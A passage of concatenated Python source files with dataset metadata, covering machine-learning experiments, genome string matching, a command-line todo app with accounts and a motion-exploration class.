kernel_fn,
verbose=False,
random_state=None):
self.kernel_fn = kernel_fn
self.verbose = verbose
self.random_state = check_random_state(random_state)
@staticmethod
def generate_lars_path(weighted_data, weighted_labels):
x_vector = weighted_data
alphas, _, coefs = lars_path(x_vector,
weighted_labels,
method='lasso',
verbose=False)
return alphas, coefs
def forward_selection(self, data, labels, weights, num_features):
clf = Ridge(alpha=0, fit_intercept=True, random_state=self.random_state)
used_features = []
for _ in range(min(num_features, data.shape[1])):
max_ = -100000000
best = 0
for feature in range(data.shape[1]):
if feature in used_features:
continue
clf.fit(data[:, used_features + [feature]], labels,
sample_weight=weights)
score = clf.score(data[:, used_features + [feature]],
labels,
sample_weight=weights)
if score > max_:
best = feature
max_ = score
used_features.append(best)
return np.array(used_features)
def feature_selection(self, data, labels, weights, num_features, method):
if method == 'none':
return np.array(range(data.shape[1]))
elif method == 'forward_selection':
return self.forward_selection(data, labels, weights, num_features)
elif method == 'highest_weights':
clf = Ridge(alpha=0, fit_intercept=True,
random_state=self.random_state)
clf.fit(data, labels, sample_weight=weights)
feature_weights = sorted(zip(range(data.shape[0]),
clf.coef_ * data[0]),
key=lambda x: np.abs(x[1]),
reverse=True)
return np.array([x[0] for x in feature_weights[:num_features]])
elif method == 'lasso_path':
weighted_data = ((data - np.average(data, axis=0, weights=weights))
* np.sqrt(weights[:, np.newaxis]))
weighted_labels = ((labels - np.average(labels, weights=weights))
* np.sqrt(weights))
nonzero = range(weighted_data.shape[1])
_, coefs = self.generate_lars_path(weighted_data,
weighted_labels)
for i in range(len(coefs.T) - 1, 0, -1):
nonzero = coefs.T[i].nonzero()[0]
if len(nonzero) <= num_features:
break
used_features = nonzero
return used_features
elif method == 'auto':
if num_features <= 6:
n_method = 'forward_selection'
else:
n_method = 'highest_weights'
return self.feature_selection(data, labels, weights, num_features, n_method)
elif method == 'boruta':
rf = RandomForestRegressor(n_jobs=-1)
feat_selector = BorutaPy(rf, n_estimators='auto', verbose=2, random_state=1)
feat_selector.fit(data, labels)
feat_selector.ranking_
return np.where(feat_selector.support_)[0]
def explain_instance_with_data(self,
neighborhood_data,
neighborhood_labels,
distances,
label,
num_features,
feature_selection='auto',
model_regressor=None,
regressor='linear'):
weights = self.kernel_fn(distances)
labels_column = neighborhood_labels[:, label]
used_features = self.feature_selection(neighborhood_data,
labels_column,
weights,
num_features,
feature_selection)
if model_regressor is None:
model_regressor = Ridge(alpha=1, fit_intercept=True,
random_state=self.random_state)
easy_model = model_regressor
easy_model.fit(neighborhood_data[:, used_features],
labels_column, sample_weight=weights)
prediction_score = easy_model.score(
neighborhood_data[:, used_features],
labels_column, sample_weight=weights)
local_pred = easy_model.predict(neighborhood_data[0, used_features].reshape(1, -1))
if self.verbose:
print('Intercept', easy_model.intercept_)
print('Prediction_local', local_pred,)
print('Right:', neighborhood_labels[0, label])
return (easy_model.intercept_,
sorted(zip(used_features, easy_model.coef_),
key=lambda x: np.abs(x[1]), reverse=True),
prediction_score, local_pred) | true |
69bb31017fada8da3a1dd17de5161895db175328 | Python | HxLyn3/Machine-Learning | /05 Neural Network/5.8/test.py | UTF-8 | 2,529 | 2.796875 | 3 | [] | no_license | """
- Author: Haoxin Lin
- E-mail: linhx36@outlook.com
- Date: 2020/11/25
- Brief: Test Self-Organizing Network with watermelon dataset 3.0alpha
"""
import xlrd
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.gridspec import GridSpec
from SOM import SOM
# load data
data = xlrd.open_workbook('../WTMLDataSet_3.0alpha.xlsx')
table = data.sheet_by_name('WTML')
dataset = []
for i in range(table.nrows):
line = table.row_values(i)
dataset.append(line)
dataset = np.array(dataset)
xs = dataset[1:, 1:-1].astype(np.float64)
ys = (dataset[1:, -1]=='是').astype(np.int32)
SOMNet = SOM(xs.shape[1], map_shape=[8, 8])
SOMNet.learn(xs, steps=1000, batch_size=17)
# plot data (before mapping)
plt.figure()
positive_xs = xs[ys==1]
negative_xs = xs[ys==0]
plt.scatter(positive_xs[:, 0], positive_xs[:, 1], marker='o', c='w', edgecolors='#00CED1', s=80, label='Great (positive)')
plt.scatter(negative_xs[:, 0], negative_xs[:, 1], marker='s', c='w', edgecolors='#DC143C', s=80, label='Awful (negative)')
plt.legend(loc="upper right", bbox_to_anchor=(1.01, 1.16))
# map
mapped_xs = SOMNet.forward(xs)
positive_xs = mapped_xs[ys==1] + 0.5
negative_xs = mapped_xs[ys==0] + 0.5
# plot data (after mapping)
plt.figure()
plt.scatter(positive_xs[:, 0], positive_xs[:, 1], marker='o', c='w', edgecolors='#00CED1', s=80, label='Great (positive)')
plt.scatter(negative_xs[:, 0], negative_xs[:, 1], marker='s', c='w', edgecolors='#DC143C', s=80, label='Awful (negative)')
plt.axis([0, SOMNet.map_shape[0], 0, SOMNet.map_shape[1]])
ax = plt.gca()
ax.invert_yaxis()
plt.grid(linestyle='-.')
plt.legend(loc="upper right", bbox_to_anchor=(1.01, 1.16))
# distribution at each mapped position
plt.figure()
plt.axes(aspect='equal')
the_grid = GridSpec(SOMNet.map_shape[0], SOMNet.map_shape[1])
colors = ['C0', 'C1']
for idx in range(SOMNet.map_shape[0]*SOMNet.map_shape[1]):
pos = np.array([idx//SOMNet.map_shape[1], idx%SOMNet.map_shape[1]])
if 0 in np.sum((mapped_xs-pos)**2, axis=-1):
plt.subplot(the_grid[pos[1], pos[0]], aspect=1)
ys_at_this_pos = ys[np.sum((mapped_xs-pos)**2, axis=-1)==0]
pnum = np.sum(ys_at_this_pos)
nnum = len(ys_at_this_pos) - pnum
plt.pie(x=[pnum, nnum], colors=colors, labels=['Great (positive)', 'Awful (negative)'], textprops={'fontsize': 0, 'color': 'w'})
plt.text(pos[0]/100, pos[1]/100, str(pnum+nnum), color='black', fontdict={'weight': 'bold', 'size': 10}, va='center', ha='center')
plt.legend(loc="upper right", bbox_to_anchor=(4, 3))
plt.show()
| true |
d78041298d13b948c3c9ba8fb46bee854145b6fe | Python | bmasoumi/BioInfoMethods | /NaiveExactMatching.py | UTF-8 | 4,395 | 3.421875 | 3 | [] | no_license | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Sep 11 10:31:09 2018
@author: Beeta
Implementation of exact matching algorithms
- Naive Exact Matching(Brute Force)
"""
def readFASTA(filename):
genome = ''
with open(filename, 'r') as f:
for line in f:
if not line[0] == '>':
genome += line.rstrip()
return genome
genome = readFASTA('phix.fa')
#=============================
# Naive exact matching
# aka Brute Force
#=============================
# returns offsets of pattern p in text t
def BruteForce(p, t):
occurrences = []
for i in range(len(t)-len(p)+1): # loop over alignment
match = True
for j in range(len(p)): # loop over characters
if t[i+j] != p[j]: # compare characters
match = False # mismatch
break
if match: # allchars matched
occurrences.append(i)
return occurrences
p = 'word'
t = 'this sentence contains a word'
occurrences = BruteForce(p, t)
print(occurrences) # 25 is the answer
min_no_comparisons = len(t)-len(p)+1
max_no_comparisons = len(p)*(len(t)-len(p)+1)
print(min_no_comparisons, max_no_comparisons) #answer is 26 & 104
p = 'AG'
t = 'AGCCCTTTGATAGTTTCAG'
BruteForce(p,t) # answer is [0, 11, 17]
# test the answer
print(t[:2], t[11:13], t[17:19])
# generate artifical reads from random positions in a given genome phix
import random
def generateReads(genome, numReads, readLen):
reads = []
for _ in range(numReads):
start = random.randint(0, len(genome)-readLen) - 1
reads.append(genome[start: start+readLen])
return reads
reads = generateReads(genome, 100, 100)
print(reads)
# matching artifical reads
# how many of these reads match the genome exactly
# obviously the answer should be all of them bc
# these are generated from this genome and there is no error involved
numMatched = 0
for r in reads:
matched = BruteForce(r ,genome)
if len(matched) > 0:
numMatched += 1
print('%d / %d reads matched the genome exactly' % (numMatched, len(reads)))
"""
# using python string methods
example = 'this sentence contains a word'
example.find('word') #find method returns the offset of the pattern (the leftmost)
# 'word' occurs at offset 25
"""
# matching real reads
# from a FASTQ file ERR266411_1.for_asm.fastq
# that has real reads from phix
def readFASTQ(filename):
sequences = []
qualities = []
with open(filename, 'r') as f:
while True:
f.readline()
seqs = f.readline().rstrip()
f.readline()
quals = f.readline().rstrip()
if len(seqs) == 0:
break
sequences.append(seqs)
qualities.append(quals)
return sequences, qualities
phix_reads, _ = readFASTQ('ERR266411_1.for_asm.fastq')
print(phix_reads, len(phix_reads))
numMatched = 0
total = 0
for r in phix_reads:
matched = BruteForce(r, genome)
total += 1
if len(matched) > 0:
numMatched += 1
print('%d / %d reads matched the genome' % (numMatched, total))
# answer is 502 / 10000 reads matched the genome
# bc of sequencing errors or
# bc the reference genome is double stranded and we checked only one
# now lets chnage it to matching only 30 first bases of reads
numMatched = 0
total = 0
for r in phix_reads:
r = r[:30]
matched = BruteForce(r, genome)
total += 1
if len(matched) > 0:
numMatched += 1
print('%d / %d reads matched the genome' % (numMatched, total))
# answer is 3563 / 10000 reads matched the genome
# still very low matching
# so lets do the same thing for the reverse complement of the read
def reverseComplement(s):
complement = {'A':'T', 'C':'G', 'T':'A', 'G':'C', 'N':'N'}
t = ''
for base in s:
t = complement[base] + t
return t
reverseComplement(phix_reads[1])
numMatched = 0
total = 0
for r in phix_reads:
r = r[:30]
matched = BruteForce(r, genome) # matches in forward strand
matched.extend(BruteForce(reverseComplement(r), genome)) # matches in reverse strand
total += 1
if len(matched) > 0:
numMatched += 1
print('%d / %d reads matched the genome' % (numMatched, total))
# answer is 8036 / 10000 reads matched the genome
# much better result
| true |
0e341e8d134c21a6461e8bd2cd0592c6f105b6fd | Python | realqnn/GoogleML-learn | /validation.py | UTF-8 | 4,720 | 3.015625 | 3 | [] | no_license | # -*- coding: utf-8 -*-
"""
使用多个特征而非单个特征来进一步提高模型的有效性
调试模型输入数据中的问题
使用测试数据集检查模型是否过拟合验证数据
"""
import math
from IPython import display
from matplotlib import cm
from matplotlib import gridspec
from matplotlib import pyplot as plt
import numpy as np
import pandas as pd
from sklearn import metrics
import tensorflow as tf
from tensorflow.python.data import Dataset
from tensorflow_first_learn import LinearRe
tf.logging.set_verbosity(tf.logging.ERROR)
pd.options.display.max_rows = 10
pd.options.display.float_format = '{:.1f}'.format
#加载数据
california_housing_dataframe = pd.read_csv("https://storage.googleapis.com/ml_universities/california_housing_train.csv", sep=",")
#数据随机化
california_housing_dataframe = california_housing_dataframe.reindex(
np.random.permutation(california_housing_dataframe.index)
)
def preprocess_feature(dataframe):
"""
处理输入数据为我们需要的特征
:param dataframe: 输入的额数据集,在这里是califonia_housing,为pandas dataframe
:return: dataframe,包含模型需要的特征
"""
selected_features = dataframe[
[
"latitude",
"longitude",
"housing_median_age",
"total_rooms",
"total_bedrooms",
"population",
"households",
"median_income"
]
]
prcessed_feature = selected_features.copy()
#合成特征
prcessed_feature["rooms_per_person"] = (
dataframe["total_rooms"]/dataframe["population"]
)
return prcessed_feature
def preprocess_targets(dataframe):
"""
处理数据为我们需要的目标标签
:param dataframe: 输入的额数据集,在这里是califonia_housing,为pandas dataframe
:return: dataframe,目标标签
"""
output_targets = pd.DataFrame()
#正规化处理itargets,把数值统一为k级
output_targets["median_house_value"] = (
dataframe["median_house_value"]/1000.0
)
return output_targets
#构建训练集
training_examples = preprocess_feature(california_housing_dataframe.head(12000))
# print(training_examples.describe())
training_targets = preprocess_targets(california_housing_dataframe.head(12000))
# print(training_targets.describe())
#构建验证集
validation_examples = preprocess_feature(california_housing_dataframe.tail(5000))
# print(validation_examples.describe())
validation_targets = preprocess_targets(california_housing_dataframe.tail(5000))
# print(validation_targets.describe())
# #绘制纬度/经度与房屋价值中位数的曲线图
# plt.figure(figsize=(13, 8))
#
# ax = plt.subplot(1, 2, 1)
# ax.set_title("Validation Data")
#
# ax.set_autoscaley_on(False)
# ax.set_ylim([32, 43])
# ax.set_autoscalex_on(False)
# ax.set_xlim([-126, -112])
# plt.scatter(validation_examples["longitude"],
# validation_examples["latitude"],
# cmap="coolwarm",
# c=validation_targets["median_house_value"]/validation_targets["median_house_value"].max())
# ax = plt.subplot(1,2,2)
# ax.set_title("Training Data")
#
# ax.set_autoscaley_on(False)
# ax.set_ylim([32, 43])
# ax.set_autoscalex_on(False)
# ax.set_xlim([-126, -112])
# plt.scatter(training_examples["longitude"],
# training_examples["latitude"],
# cmap="coolwarm",
# c=training_targets["median_house_value"] / training_targets["median_house_value"].max())
# plt.show()
lr = LinearRe()
LINEAR_REGRESSOR = lr.train_model_moreFeatures(
learning_rate=0.00003,
steps=500,
batch_size=5,
training_examples=training_examples,
training_targets=training_targets,
validation_examples=validation_examples,
validation_targets=validation_targets
)
#测试
california_housing_test_data = pd.read_csv("https://storage.googleapis.com/ml_universities/california_housing_test.csv", sep=",")
test_examples = preprocess_feature(california_housing_test_data)
test_targets = preprocess_targets(california_housing_test_data)
predict_test_input_fn = lambda: lr.my_input_fn(
test_examples,
test_targets["median_house_value"],
num_epochs=1,
shuffle=False)
test_predictions = LINEAR_REGRESSOR.predict(input_fn=predict_test_input_fn)
test_predictions = np.array([item['predictions'][0] for item in test_predictions])
root_mean_squared_error = math.sqrt(
metrics.mean_squared_error(test_predictions, test_targets))
print ("Final RMSE (on test data): %0.2f" % root_mean_squared_error)
| true |
9be339d0949286e23b23bf1de06326b61e645e95 | Python | javid-aliyev/Todo-list-application-Python | /app.py | UTF-8 | 4,067 | 2.625 | 3 | [] | no_license | import sys
import hashlib
import tools
import db_creator
from task import Task
from account import Account
class App:
def __init__(self, argv):
self._argv = argv
self.id2task = {}
self.account = "guest" # current account
self.main()
def _id2task(self, tasks):
"""Returns a dict where key is index, value is tuple,
where [0] is task and [1] is the status of a task
:param tasks: dict
:return: dict
"""
result = {}
for index, task in zip(range(1,len(tasks)+1), tasks.items()):
result[index] = task
return result
def _execute_command(self, command):
"""Executes a given command (account param is current active account)
:param command: str
:param account: str
"""
# task
if command == "add":
task = tools._sinput("task? ").strip()
if task != "":
Task.create(task, self.account)
elif command == "rmall":
Task.remove_accounts_tasks_without_slot(self.account)
elif command == "ls":
tasks = Task.get(self.account)
if tasks:
for i, task in zip(range(1, len(tasks)+1), tasks.items()):
if task[1]:
tools.success(f"{i}. {task[0]}") # green output print
else:
print(f"{i}. {task[0]}")
# FIX NEXT 8 lines (find more elegant answer). Also tools.process.. is tmp function
elif command == "rm":
print("{index_of_task} or \\{task_name}")
tools.process_task_or_index(self.id2task, command, self.account, Task.remove)
elif command == "done":
print("{index_of_task} or \\{task_name}")
tools.process_task_or_index(self.id2task, command, self.account, Task.mark_as, done=True)
elif command == "undone":
print("{index_of_task} or \\{task_name}")
tools.process_task_or_index(self.id2task, command, self.account, Task.mark_as, done=False)
# account
elif command == "addacc":
login = tools._sinput("login? ")
password = tools._secured_sinput("password(not required)? ")
password = hashlib.sha256(password.encode("utf8")).hexdigest()
if login.strip() == "":
tools.warn("login form is required")
else:
Account.create(login, password)
# a slot in tasks.json
Task.create_slot_for(login)
elif command == "rmacc":
account = tools._sinput("account to remove? ")
password = tools._secured_sinput("password of the account? ")
password = hashlib.sha256(password.encode("utf8")).hexdigest()
real_password = Account.get_password_by_login(account) # real hashed password
if account == "":
tools.error("invalid account")
return
if account == self.account:
tools.error("you cannot delete the account you are on at the moment (go to the guest account)")
return
if password == real_password:
Account.remove(account)
Task.remove_accounts_tasks(account)
elif command == "lsaccs":
for account in Account.get():
if account == self.account:
tools.success(f"* {account}")
else:
print(f"* {account}")
elif command == "login":
account = tools._sinput("account to login? ")
password = tools._secured_sinput("password of the account? ")
password = hashlib.sha256(password.encode("utf8")).hexdigest()
real_password = Account.get_password_by_login(account) # real hashed password
if account == "":
tools.error("invalid login")
return
if password == real_password:
self.account = account
tools.success(f"you logged in as {account}")
else:
tools.error("invalid login or password")
elif command == "whoami":
tools.success(self.account)
# other commands
elif command == ":quit":
sys.exit()
elif command == ":clear":
tools._clear_console()
elif command == ":help":
tools._print_help_info()
elif command == "":
pass
else:
tools.error(f"no such command: '{command}'")
def main(self):
tools.info("type ':help' to get all commands")
while True:
self.id2task = self._id2task(Task.get(self.account))
npt = tools._sinput("~> ").strip()
self._execute_command(npt)
if __name__ == "__main__":
if not tools.db_exists():
tools.info("database was created")
db_creator.create_database()
App(sys.argv) | true |
2f55793e6d7b9b1850ef296c49ccfa7ac2affdbd | Python | stevewfogarty/todo-api-fastapi | /model/model.py | UTF-8 | 414 | 2.640625 | 3 | [
"MIT"
] | permissive | from pydantic import BaseModel
from datetime import datetime
from typing import NewType, Optional
# Declare a new type of variable ID
ID = NewType("id", int)
class Task(BaseModel):
"""
Definition of components of a task
"""
summary: str
priority: int
# due_date: Optional[datetime]
class TaskList(BaseModel):
"""
Definition of the TaskList
"""
id: ID
task: Task
| true |
9745361200c4745ac9af12e47df52f7a6f478e4b | Python | ingwplanchez/Python | /Program_35_Anidamiento3.py | UTF-8 | 469 | 2.640625 | 3 | [] | no_license | #-------------------------------------------------------------------------------
# Name: module1
# Purpose:
#
# Author: James Marshall
#
# Created: 21/04/2012
# Copyright: (c) James Marshall 2012
# Licence: <your licence>
#-------------------------------------------------------------------------------
def main():
pass
if __name__ == '__main__':
main()
for i in range(0,4):
for j in range(0,4):
for k in range(0,4):
print i,j,k | true |
892617551092658a4e327acedb1ad1db220db69d | Python | harinisridhar1310/Guvi | /Count_digit.py | UTF-8 | 72 | 2.96875 | 3 | [] | no_license | #harini
a=int(input())
c=0
while(a>0):
b=a%10
c=c+1
a=a//10
print(c)
| true |
8e35a9deb46afc08933a81b2ea801fd73b18dbb6 | Python | code1077/Python_practice_AOFI_1718 | /obregon-avila-steven/ejercicio6.py | UTF-8 | 301 | 3.546875 | 4 | [] | no_license |
numero = 0
bucle = "Si"
while bucle == "Si":
numero = int(input("Introduce el numero que quieras:\n"))
if (numero % 2 == 0):
print("Este numero es par")
if (numero % 2 != 0):
print("Este numero es inpar")
bucle = input ("Quieres añadir mas datos a la tabla?: si/no ?\n")
if bucle != "Si": | true |
7a92868d87b1d77c277463e08315ea58fc3a2973 | Python | jrodriguezballester/inicioPython2 | /ejercicio3.py | UTF-8 | 604 | 4.46875 | 4 | [] | no_license | ''' Ejercicio 3
Escribir una función filtrar_palabras() que tome una lista de palabras y un entero n, y
devuelva las palabras que tengan más de n carácteres.'''
def filtar_palabras(palabras, n):
palabras_mayores = []
for palabra in palabras:
if len(palabra) > n:
palabras_mayores.append(palabra)
return palabras_mayores
# comprobacion
palabras = ['jose', 'alberto', 'juanito', 'marta', 'pato']
print(f'palabras con mas (estricto) de 5 caracteres:{filtar_palabras(palabras, 5)}')
print(f'palabras con mas (estricto) de 4 caracteres:{filtar_palabras(palabras, 4)}')
| true |
6cc9637815cd81be9a884f173cf76db3b079809d | Python | arnaudmm/django-bootstrap5 | /tests/test_bootstrap_pagination.py | UTF-8 | 2,163 | 2.671875 | 3 | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | from django.core.paginator import Paginator
from django_bootstrap5.utils import url_replace_param
from tests.base import BootstrapTestCase
class PaginatorTestCase(BootstrapTestCase):
def test_url_replace_param(self):
self.assertEqual(url_replace_param("/foo/bar?baz=foo", "baz", "yohoo"), "/foo/bar?baz=yohoo")
self.assertEqual(url_replace_param("/foo/bar?baz=foo", "baz", None), "/foo/bar")
self.assertEqual(url_replace_param("/foo/bar#id", "baz", "foo"), "/foo/bar?baz=foo#id")
def bootstrap_pagination(self, page, extra=""):
"""Helper to test bootstrap_pagination tag."""
return self.render(f"{{% bootstrap_pagination page {extra} %}}", {"page": page})
def test_paginator(self):
objects = ["john", "paul", "george", "ringo"]
paginator = Paginator(objects, 2)
html = self.bootstrap_pagination(paginator.page(2), extra='url="/projects/?foo=bar"')
self.assertHTMLEqual(
html,
"""
<nav>
<ul class="pagination">
<li class="page-item"><a class="page-link" href="/projects/?foo=bar&page=1">«</a></li>
<li class="page-item"><a class="page-link" href="/projects/?foo=bar&page=1">1</a></li>
<li class="page-item active"><a class="page-link" href="#">2</a></li>
<li class="page-item disabled"><a class="page-link" href="#">»</a></li>
</ul>
</nav>
""",
)
self.assertIn("/projects/?foo=bar&page=1", html)
self.assertNotIn("/projects/?foo=bar&page=2", html)
html = self.bootstrap_pagination(paginator.page(2), extra='url="/projects/#id"')
self.assertIn("/projects/?page=1#id", html)
self.assertNotIn("/projects/?page=2#id", html)
html = self.bootstrap_pagination(paginator.page(2), extra='url="/projects/?page=3#id"')
self.assertIn("/projects/?page=1#id", html)
self.assertNotIn("/projects/?page=2#id", html)
html = self.bootstrap_pagination(paginator.page(2), extra='url="/projects/?page=3" extra="id=20"')
self.assertIn("/projects/?page=1&id=20", html)
self.assertNotIn("/projects/?page=2&id=20", html)
| true |
cad5dd0dc7d6655858421499a723926104174146 | Python | whyang78/machineLearning-base | /AdaBoost/simple/病马疝气死亡率.py | UTF-8 | 1,738 | 2.984375 | 3 | [] | no_license | import numpy as np
from sklearn.ensemble import AdaBoostClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.model_selection import GridSearchCV
def loadDataSet(fileName):
numFeat = len((open(fileName).readline().split('\t')))
dataMat = []; labelMat = []
fr = open(fileName)
for line in fr.readlines():
lineArr = []
curLine = line.strip().split('\t')
for i in range(numFeat - 1):
lineArr.append(float(curLine[i]))
dataMat.append(lineArr)
labelMat.append(float(curLine[-1]))
return dataMat, labelMat
if __name__ == '__main__':
traindata, trainlabel = loadDataSet('../horseColicTraining2.txt')
testdata, testlabel = loadDataSet('../horseColicTest2.txt')
clf=AdaBoostClassifier(base_estimator=DecisionTreeClassifier())
params = {'n_estimators':[1,2,3,4,5,6,7,8,9,10], #np.arange(1,10+1,1) x
'algorithm':['SAMME','SAMME.R'],
'base_estimator__max_depth':[1,2,3,4,5,6,7,8,9,10],
'base_estimator__criterion':['gini','entropy']
}
model=GridSearchCV(clf,params,cv=10)
model.fit(traindata,trainlabel)
print('最优参数:',model.best_params_)
print('训练分数:',model.best_score_)
clf=AdaBoostClassifier(DecisionTreeClassifier(max_depth=2),n_estimators=10,algorithm='SAMME')
clf.fit(traindata,trainlabel)
test=clf.predict_proba(testdata)
train_score=clf.score(traindata,trainlabel)
test_score=clf.score(testdata,testlabel)
print('训练分数:{:.5f},测试分数:{:.5f}'.format(train_score,test_score))
import scikitplot as skplt
import matplotlib.pyplot as plt
skplt.metrics.plot_roc(testlabel,test)
plt.show() | true |
f8edc5b64c85be353575496fe32838741527f893 | Python | teamwork523/Tools | /data/boxErrorBarWithCategories.py | UTF-8 | 1,766 | 3.140625 | 3 | [] | no_license | #!/usr/bin/env python
import sys, math
# convert the data into box error bar plot based on
def getMedian(li):
# assume li sorted
length = len(li)
if length == 0:
return None
elif length == 1:
return li[0]
if length % 2 == 0:
return float(li[int(length / 2)] + li[int(length / 2) - 1]) / 2.0
else:
return float(li[int(length / 2)])
def Usage():
print sys.argv[0] + " cat_col(z) data_col(y) x_label categories_list header < filepath"
def main():
DEL = "\t"
if (len(sys.argv) == 2 and sys.argv[1] == "-h"):
Usage()
sys.exit(1)
# check header
if sys.argv[-1] == "y" or sys.argv[-1] == "Y":
header = sys.stdin.readline()
cat_col = int(sys.argv[1]) - 1
data_col = int(sys.argv[2]) - 1
x_label = sys.argv[3]
cat_list = sys.argv[4:-1]
dataMap = {}
while True:
line = sys.stdin.readline()
if not line: break
curData = line.strip().split()
category = curData[cat_col]
if category not in cat_list:
continue
data = 0.0
try:
data = float(curData[data_col])
except ValueError:
print >> sys.stderr, "ValueError detected: " + line
if not dataMap.has_key(category):
dataMap[category] = []
dataMap[category].append(data)
# output result
line = x_label + DEL
for category in cat_list:
sortedData = sorted(dataMap[category])
dataLen = len(sortedData)
line += str(getMedian(sortedData)) + DEL
line += str(sortedData[(int)(0.05*dataLen)]) + DEL
line += str(sortedData[(int)(0.95*dataLen)]) + DEL
print line.strip()
if __name__ == "__main__":
main()
| true |
20655507caad922cd618cc2c018fe44eab9a5d1d | Python | shuwenyue/Terminal_talk | /voice.py | UTF-8 | 3,381 | 3.265625 | 3 | [] | no_license | class Voice:
cmdDict = {'copy' : 'cp',
'cp' : 'cp',
'move' : 'mv',
'rename' : 'mv',
'make directory' : 'mkdir',
'list' : 'ls',
'ls' : 'ls',
'remove' : 'rm',
'change directory' : 'cd',
'cd' : 'cd',
'search' : 'grep',
'ssh' : 'ssh',
'python' : 'python',
'bash' : 'bash',
'run' : 'bash',
'go back' : 'cd ..',
'print directory' : 'pwd',
'pwd' : 'pwd',
'open' : 'open',
'say' : 'say',
'touch' : 'touch'} #Dictionary of commands
subsDict = {'user' : '-u',
'all' : '-a',
'recursively' : '-r',
'underscore' : '_',
'star' : '*',
'asterisk' : '*'} #Dictionary of word substitutions
toRem = {'to', 'the', 'a', 'from', 'for'} #Set of words to remove
# Reads in string
def __init__(self, command):
self.cmdStr = self.removeExtra(command.split())
self.argInd = 0
# Returns command as string
def getcommand(self):
try:
cmd = self.cmdDict[self.cmdStr[0]]
self.argInd = 1
return cmd
except KeyError:
try:
cmd = self.cmdDict[self.cmdStr[0]+' '+self.cmdStr[1]]
self.argInd = 2
return cmd
except (KeyError, IndexError) as e:
raise ValueError
# Returns arguments as list
def getarg(self):
if self.argInd == 0:
self.getcommand()
if len(self.cmdStr) == self.argInd:
return []
args = self.cmdStr[self.argInd:]
arg2 = self.substitute(args)
arg3 = self.remSpace(arg2)
return arg3
# Removes superfluous words
def removeExtra(self, argList):
return [arg for arg in argList if arg not in self.toRem]
# Substitutes for words
def substitute(self, argList):
for i in range(len(argList)):
try:
argList[i]=self.subsDict[argList[i]]
except:
pass
return argList
# Remove space after periods, before numbers, and before and after underscore
def remSpace(self, argList):
i = 0
while i < len(argList):
if argList[i][-1] == '.' and i+1 < len(argList):
# Combine with next
argList[i:i+2] = [''.join(argList[i:i+2])]
elif self.checkNum(argList[i][0]) and i > 0:
# Combine with previous
argList[i-1:i+1] = [''.join(argList[i-1:i+1])]
elif argList[i] == '_' and i > 0 and i+1 < len(argList):
# Combine with next and previous
argList[i-1:i+2] = [''.join(argList[i-1:i+2])]
elif argList[i] == '_' and i > 0:
# Combine with previous
argList[i-1:i+1] = [''.join(argList[i-1:i+1])]
elif argList[i] == '_':
# Combine with next
argList[i:i+2] = [''.join(argList[i:i+2])]
else:
i += 1
return argList
# Check if string is number
def checkNum(self, string):
try:
int(string)
return True
except ValueError:
return False
| true |
a6a45f9491deebc14dcd5761248f0cf59fc71167 | Python | nd1511/beer | /recipes/clustering/utils/gmm-train.py | UTF-8 | 3,008 | 2.59375 | 3 | [
"MIT"
] | permissive |
'Train a HMM with a given alignments.'
import random
import numpy as np
import torch
import argparse
import sys
import beer
import pickle
import logging
import os
log_format = "%(asctime)s %(levelname)s: %(message)s"
logging.basicConfig(level=logging.INFO, format=log_format)
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--epochs', type=int, default=1,
help='number of epochs to train')
parser.add_argument('--fast-eval', action='store_true')
parser.add_argument('--lrate', type=float, default=1.,
help='learning rate')
parser.add_argument('--use-gpu', action='store_true')
parser.add_argument('--verbose', action='store_true')
parser.add_argument('model', help='model to train')
parser.add_argument('batches', help='list of batches file')
parser.add_argument('feat_stats', help='data statistics')
parser.add_argument('out', help='output model')
args = parser.parse_args()
if args.verbose:
logging.getLogger().setLevel(logging.DEBUG)
# Load the data.
stats = np.load(args.feat_stats)
# Load the batches.
batches_list = []
with open(args.batches, 'r') as f:
for line in f:
batches_list.append(line.strip())
# Load the model and move it to the chosen device (CPU/GPU)
with open(args.model, 'rb') as fh:
model = pickle.load(fh)
if args.use_gpu:
device = torch.device('cuda')
else:
device = torch.device('cpu')
model = model.to(device)
# Prepare the optimizer for the training.
params = model.mean_field_groups
optimizer = beer.BayesianModelCoordinateAscentOptimizer(params,
lrate=args.lrate)
tot_counts = int(stats['nframes'])
for epoch in range(1, args.epochs + 1):
# Shuffle the order of the utterance.
random.shuffle(batches_list)
for batch_no, path in enumerate(batches_list, start=1):
# Reset the gradients.
optimizer.zero_grad()
# Load the batch data.
batch = np.load(path)
ft = torch.from_numpy(batch['features']).float()
ft = ft.to(device)
# Compute the objective function.
elbo = beer.evidence_lower_bound(model, ft, datasize=tot_counts,
fast_eval=args.fast_eval)
# Compute the gradient of the model.
elbo.natural_backward()
# Update the parameters.
optimizer.step()
elbo_value = float(elbo) / tot_counts
log_msg = 'epoch={}/{} batch={}/{} elbo={}'
logging.info(log_msg.format(
epoch, args.epochs,
batch_no, len(batches_list),
round(elbo_value, 3))
)
with open(args.out, 'wb') as fh:
pickle.dump(model.to(torch.device('cpu')), fh)
if __name__ == "__main__":
main()
| true |
9c4642126876201ba910749fd7812f76f15d9c5d | Python | HelsinkiGroup5/Hackathon | /rto.py | UTF-8 | 11,200 | 3.3125 | 3 | [
"MIT"
] | permissive | import numpy as np
class MotionExplorer:
"""
Aim at exploring motions, represented as sampled observations of a n-dimensional input vector.
This stream of vectors describe a vector space in which the Mahalanobis distance is used to
assess the distance of new samples to previously seen samples. Everytime a new sample is
observed that is when that K nearest neighbour are in average further away than N standard deviation, the new sample is deamed original and saved to the attribute observations.
"""
def __init__(self, inputdim = 2, stepsize = 10, order = 4, window = 30,
start_buffer = 10, periodic_recompute = 5, number_of_neighbour = 5,
number_of_stdev = 4.5
):
"""
Parameters
----------
inputdim : int
the number of dimension of the input vector.
stepsize : int
The size of the interpolation step in milliseconds.
order : int
The dimension of the output vector, 1 is position only, 2 includes velocity, 3 provides acceleration, and so on.
window : int
The size of the averaging window in samples.
start_buffer : int
The number of sample is takes before any observation can be saved, this leaves time
for the Savitsky Golay interpolation to start ouputing some data.
periodic_recompute : int
The number of samples after which mean and covarianve of saved observations will be recomputed.
number_of_neighbour : int
The number of closest neighnbours that are considered when assessing if a new sample is original or not.
number_of_stdev : float
The number of standard deviation a new vectors has to be from the mean of K nearest neighbour as measured by Mahalanobis distance. When the mean of K is greater than this value, the new sample is considered original and saved to observations.
